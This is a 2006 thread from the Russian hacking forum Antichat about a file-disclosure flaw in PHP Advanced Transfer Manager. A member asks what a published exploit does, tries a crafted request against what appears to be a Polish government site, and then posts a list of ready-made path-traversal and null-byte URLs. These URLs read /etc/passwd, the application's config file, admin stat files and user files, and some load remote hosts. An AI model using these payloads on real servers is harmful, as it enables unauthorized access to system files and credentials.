Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   PHP Advanced Transfer Manager (https://forum.antichat.xyz/showthread.php?t=29918)

karabym 26.12.2006 05:40
PHP Advanced Transfer Manager
 
Разьясните что делает эта уязвимость ?!

http://www.milw0rm.com/exploits/2968

limpompo 26.12.2006 11:50
Там же всё прекрастно Написано

in folder users we dont find any file like: .htaccess so we can read all files :)
or you can read all files in ftp :)

karabym 26.12.2006 12:19
limpompo c энглишом проблем елси не сложно просвяти :)

злюка 26.12.2006 12:58
написано что в пользовательской папке не будет файлов а-ля .htaccess, благодаря чему появится возможность читать все файлы (в том числе и по ftp)

karabym 26.12.2006 13:40
Погодь погодь !! тоесть можно будет просматреть все файлы на веб сервере ?!

злюка 26.12.2006 13:55
Цитата:
Сообщение от karabym
Погодь погодь !! тоесть можно будет просматреть все файлы на веб сервере ?!
я только перевёл :) ...сам сплоит не юзал и даже в код не зглядывал.

karabym 26.12.2006 13:59
Хех придеца качать етот обмещик...конечно можно было сразу это зделать и не задавать глупых вопрос но вдруг дело выделки не стоит :)

ЭХ эта лень во всем она виновата :)

limpompo 26.12.2006 14:06
karabym - Если у тебя проблемы тебе надо на www.translate.ru/text.asp

karabym 26.12.2006 14:18
limpompo спасиб будем пользоваться :)

karabym 28.12.2006 06:56
Потыкался я тут с этим сплойтом работает он как веб скрипт но както криво...

Скажите лутше как составить запрос чтобы читать файло

http://site.gov.pl/upload/viewers/html.php?current_dir=..&filename=[file]

Я так понимаю current_dir=директория_на_вебсер ве&имя_файла=[раcширение_файла]

Попробовал так но чтото не получается..

karabym 28.12.2006 14:02
Порылся по просторам тырнета и нашел кучу дыр под ето приложение :D

http://www.example.com/phpatm/viewers/txt.php?currentdir=../../../../../../../etc/passwd%00
http://www.example.com/phpatm/viewers/txt.php?currentdir=../../../../../../../etc&filename=passwd
http://www.example.com/phpatm/viewers/htm.php?current_dir=../../../../../../../etc/passwd%00
http://www.example.com/phpatm/viewers/htm.php?current_dir=../../../../../../../etc&filename=passwd
http://www.example.com/phpatm/viewers/html.php?current_dir=../../../../../../../etc/passwd%00
http://www.example.com/phpatm/viewers/html.php?current_dir=../../../../../../../etc&filename=passwd
http://www.example.com/phpatm/viewers/htm.php?current_dir=http://www.asite.com%00
http://www.example.com/phpatm/html.php?current_dir=http:/&filename=www.asite.com
http://www.example.com/phpatm/viewers/zip.php?current_dir=../../../../../../../[filename].zip%00
http://www.example.com/phpatm/viewers/zip.php?current_dir=../../../../../../..&filename=[filename].zip
http://www.example.com/phpatm/viewers/txt.php?current_dir=../include&filename=conf.php
http://www.example.com/phpatmviewers/txt.php?current_dir=../userstat&filename=[admin_name].stat
http://www.example.com/phpatm/viewers/txt.php?current_dir=../users/admin%00
http://www.example.com/phpatm/viewers/txt.php?current_dir=../users/[admin_name]%00

m0nzt3r 28.12.2006 18:16
Тема утратила смысл.Закрыто.


Время: 12:03